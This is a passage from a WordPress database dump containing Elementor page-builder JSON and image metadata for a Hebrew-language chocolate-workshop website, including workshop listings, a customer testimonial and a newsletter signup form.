\\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(369,90,'_elementor_version','0.4'),(370,91,'_wp_attached_file','2018/05/BG.jpg'),(371,91,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1620;s:6:\"height\";i:507;s:4:\"file\";s:14:\"2018/05/BG.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"BG-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"BG-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"BG-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"BG-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:14:\"BG-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(372,92,'_wp_page_template','elementor_canvas'),(373,92,'_elementor_edit_mode','builder'),(374,92,'_elementor_template_type','post'),(375,92,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elem